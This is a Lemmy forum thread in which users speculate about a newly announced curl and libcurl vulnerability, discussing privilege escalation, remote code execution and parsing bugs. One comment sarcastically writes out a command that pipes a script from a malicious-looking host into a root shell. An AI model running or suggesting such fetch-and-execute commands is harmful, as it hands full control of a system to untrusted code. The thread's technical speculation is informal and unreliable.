• @PowerCrazy@lemmy.ml
    link
    fedilink
    99 months ago

    I don’t see how a vulnerability in Curl can exist at all unless it’s privilege escalation (you don’t run curl as root do you?) And if it’s not a privilege escalation, then it sounds like it’s just a “root user can do things that you can do as root, possibly unintended” which isn’t a vulnerability at all.

    sudo curl www.badactor.ru/hackme | bash !!!

    • @nathris@lemmy.ca
      link
      fedilink
      149 months ago

      Could be an RCE exploit. Doesn’t matter if it’s privilege escalation at that point because it can be used to execute a payload that can.

      • @PowerCrazy@lemmy.ml
        link
        fedilink
        29 months ago

        I’ll admit i’m out of my depth about exactly how curl works on the local system, but surely if there is a vulnerability in the “libcurl” library that is much more serious and severe then just saying “curl” is vulnerable.

        I’m assuming that libcurl touches a huge amount of the linux network stack.

        • @tony@lemmy.hoyle.me.uk
          link
          fedilink
          19 months ago

          They specifically say the high vulnerability one affects the command line tool, not just the library. High implies privilege escalation… I’m wondering how at this point because it’s not setuid and there’s really no reason opening a TCP socket could cause it (and if it does, that’s a kernel error not curl).

      • @taaz@biglemmowski.winOP
        link
        fedilink
        English
        2
        edit-2
        9 months ago

        To top it of it seems it’s also contained in libcurl, and getting RCEd just by doing a request does not sound fun.

    • @OsrsNeedsF2P@lemmy.ml
      link
      fedilink
      89 months ago

      Could be something curl parses that escapes the intended program boundaries. Basically the same way the latest image vulnerabilities affecting iOS, Android and browsers has been happening